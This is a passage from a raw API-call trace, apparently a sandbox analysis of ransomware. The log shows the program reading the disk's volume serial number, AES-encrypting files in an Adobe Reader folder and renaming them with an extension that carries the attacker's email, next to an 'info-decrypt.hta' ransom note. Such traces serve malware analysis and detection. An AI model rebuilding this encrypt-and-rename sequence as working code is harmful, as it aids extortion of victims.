pProxy=0x6029c14, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0149.967] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x1 [0149.967] WbemLocator:IUnknown:QueryInterface (in: This=0x6029c14, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5af74) returned 0x0 [0149.967] WbemLocator:IUnknown:QueryInterface (in: This=0x6029c14, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5af54) returned 0x0 [0149.967] WbemLocator:IClientSecurity:SetBlanket (This=0xb5af54, pProxy=0x6029c14, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0149.967] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x2 [0149.967] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0149.967] CoTaskMemFree (pv=0xbd4a08) [0149.967] WbemLocator:IUnknown:Release (This=0x60249c0) returned 0x0 [0149.967] WbemLocator:IUnknown:QueryInterface (in: This=0x6029c14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5af74) returned 0x0 [0149.968] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0149.968] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0149.968] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0149.968] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0149.969] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0149.969] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5aed4) returned 0x0 [0149.969] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5aed4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0149.969] WbemLocator:IUnknown:Release (This=0xb5aed4) returned 0x3 [0149.969] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0149.969] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0149.969] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5af5c) returned 0x0 [0149.969] WbemLocator:IRpcOptions:Query (in: This=0xb5af5c, pPrx=0xb5af74, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0149.969] WbemLocator:IUnknown:Release (This=0xb5af5c) returned 0x3 [0149.969] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0149.969] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0149.969] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0149.969] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6029c14) returned 0x0 [0149.969] WbemLocator:IUnknown:AddRef (This=0x6029c14) returned 0x4 [0149.969] WbemLocator:IUnknown:Release (This=0x6029c14) returned 0x3 [0149.969] WbemLocator:IUnknown:Release (This=0x6029c14) returned 0x2 [0149.970] SysStringLen (param_1=0x0) returned 0x0 [0149.970] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025530, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0149.970] WbemDefPath:IWbemPath:GetText (in: This=0x6025530, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0149.970] WbemDefPath:IWbemPath:GetText (in: This=0x6025530, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0149.970] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0149.970] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0149.970] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5af74) returned 0x0 [0149.970] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x3 [0149.970] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0149.970] WbemDefPath:IWbemPath:GetText (in: This=0x6025530, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0149.970] WbemDefPath:IWbemPath:GetText (in: This=0x6025530, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0149.970] IWbemServices:GetObject (in: This=0x6029c14, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028318, ppCallResult=0x0) returned 0x0 [0150.432] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60254c0, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0150.432] WbemDefPath:IWbemPath:GetText (in: This=0x60254c0, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0150.432] WbemDefPath:IWbemPath:GetText (in: This=0x60254c0, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.432] IWbemClassObject:Get (in: This=0x6028318, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36e0c90*=0, plFlavor=0x36e0c94*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36e0c90*=8, plFlavor=0x36e0c94*=0) returned 0x0 [0150.432] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.432] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.433] IWbemClassObject:Get (in: This=0x6028318, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36e0c90*=8, plFlavor=0x36e0c94*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36e0c90*=8, plFlavor=0x36e0c94*=0) returned 0x0 [0150.433] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.433] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.433] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0150.433] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x56 [0150.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0150.433] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1628bd20, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0150.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0150.433] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0150.435] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0150.435] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0150.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0150.435] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0150.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0150.435] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0150.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0150.435] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), fInfoLevelId=0x0, lpFileInformation=0x36e11b4 | out: lpFileInformation=0x36e11b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288)) returned 1 [0150.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0150.437] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0150.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0150.437] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0150.437] GetFileType (hFile=0x428) returned 0x1 [0150.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0150.437] GetFileType (hFile=0x428) returned 0x1 [0150.437] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4288 [0150.437] ReadFile (in: hFile=0x428, lpBuffer=0x393fffc, nNumberOfBytesToRead=0x4288, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x393fffc*, lpNumberOfBytesRead=0x8f6eedc*=0x4288, lpOverlapped=0x0) returned 1 [0150.440] CloseHandle (hObject=0x428) returned 1 [0150.440] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xb1dc08) returned 1 [0150.441] CryptGenRandom (in: hProv=0xb1dc08, dwLen=0x10, pbBuffer=0x39445d8 | out: pbBuffer=0x39445d8) returned 1 [0151.070] CryptImportKey (in: hProv=0xb1dc08, pbData=0x39216bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7fd50) returned 1 [0151.070] CryptContextAddRef (hProv=0xb1dc08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.070] CryptContextAddRef (hProv=0xb1dc08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.070] CryptDuplicateKey (in: hKey=0xb7fd50, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7fd90) returned 1 [0151.070] CryptContextAddRef (hProv=0xb1dc08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.070] CryptSetKeyParam (hKey=0xb7fd90, dwParam=0x4, pbData=0x392179c*=0x1, dwFlags=0x0) returned 1 [0151.070] CryptSetKeyParam (hKey=0xb7fd90, dwParam=0x1, pbData=0x3921768, dwFlags=0x0) returned 1 [0151.070] CryptEncrypt (in: hKey=0xb7fd90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39217ac*, pdwDataLen=0x8f6eea8*=0x4290, dwBufLen=0x4290 | out: pbData=0x39217ac*, pdwDataLen=0x8f6eea8*=0x4290) returned 1 [0151.071] CryptEncrypt (in: hKey=0xb7fd90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3925a60*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x3925a60*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0151.072] CryptDestroyKey (hKey=0xb7fd50) returned 1 [0151.072] CryptReleaseContext (hProv=0xb1dc08, dwFlags=0x0) returned 1 [0151.072] CryptReleaseContext (hProv=0xb1dc08, dwFlags=0x0) returned 1 [0151.072] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0151.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0151.308] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0151.309] GetFileType (hFile=0x2f0) returned 0x1 [0151.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0151.309] GetFileType (hFile=0x2f0) returned 0x1 [0151.309] WriteFile (in: hFile=0x2f0, lpBuffer=0x3926060*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3926060*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0151.310] CloseHandle (hObject=0x2f0) returned 1 [0151.310] CoTaskMemAlloc (cb=0x20c) returned 0xb82418 [0151.310] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb82418 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0151.310] CoTaskMemFree (pv=0xb82418) [0151.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.310] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0151.310] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0151.310] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0151.310] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.311] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6024a70) returned 0x0 [0151.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024a70, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0151.311] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024a70, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6025ae0) returned 0x0 [0151.311] WbemDefPath:IUnknown:Release (This=0x6024a70) returned 0x0 [0151.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ae0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6025ae0) returned 0x0 [0151.311] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ae0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0151.312] WbemDefPath:IUnknown:AddRef (This=0x6025ae0) returned 0x3 [0151.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ae0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0151.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ae0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0151.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ae0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ccae8) returned 0x0 [0151.312] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccae8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.312] WbemDefPath:IUnknown:Release (This=0x66ccae8) returned 0x3 [0151.312] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0151.312] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0151.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ae0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0151.312] WbemDefPath:IUnknown:Release (This=0x6025ae0) returned 0x2 [0151.312] WbemDefPath:IUnknown:Release (This=0x6025ae0) returned 0x1 [0151.312] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0151.312] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0151.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ae0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6025ae0) returned 0x0 [0151.312] WbemDefPath:IUnknown:AddRef (This=0x6025ae0) returned 0x3 [0151.312] WbemDefPath:IUnknown:Release (This=0x6025ae0) returned 0x2 [0151.312] WbemDefPath:IWbemPath:SetText (This=0x6025ae0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ae0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetText (in: This=0x6025ae0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetText (in: This=0x6025ae0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025ae0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ae0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0151.312] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025ae0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0151.312] 